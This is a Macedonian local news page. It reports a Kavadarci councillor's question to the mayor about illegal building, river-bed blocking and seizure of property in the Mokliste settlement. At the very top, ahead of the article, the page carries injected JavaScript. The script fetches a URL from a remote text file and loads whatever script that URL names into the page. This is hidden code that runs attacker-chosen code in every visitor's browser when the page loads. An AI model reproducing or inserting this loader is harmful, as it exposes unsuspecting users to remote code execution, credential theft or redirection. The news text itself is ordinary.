;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); (Видео) Богесвки: Кој е виновен за дивеењето во Моклиште? - Антропол
АктуелноЛокално

(Видео) Богесвки: Кој е виновен за дивеењето во Моклиште?

  • Говор на советникот Круме Богевски во Советот на Општина Кавадарци од политичката партија Левица

Секојдневно до нас пристигнуваат жалби од граѓани на некогаш мирната викенд-населба Моклиште за узурпација на јавен и приватен имот! Преградување во коритото на реката, огради-ѕидини кои го нарушуваат природниот дух на населбата и копање на ровови низ приватен имот се само дел од прекршоците кои ги пријавуваат граѓаните!

Како дојде Моклиште од една урбана оаза до статус на фавела? Кој го дозволи ова урбано дивеење и дали сите дивоградби треба да се легализираат, особено во овие критични подрачја на природата?

Во советничко прашање, членот на Советот на Општина Кавадарци, Круме Богевски до Градоначалникот, Митко Јанчев ја пренесе искрената загриженост за иднината на оваа населба!

Вистинското прашање како заклучок е: Кога ќе се стави крај на урбанистичкото дивеење и дали е истото со политички амин на власта?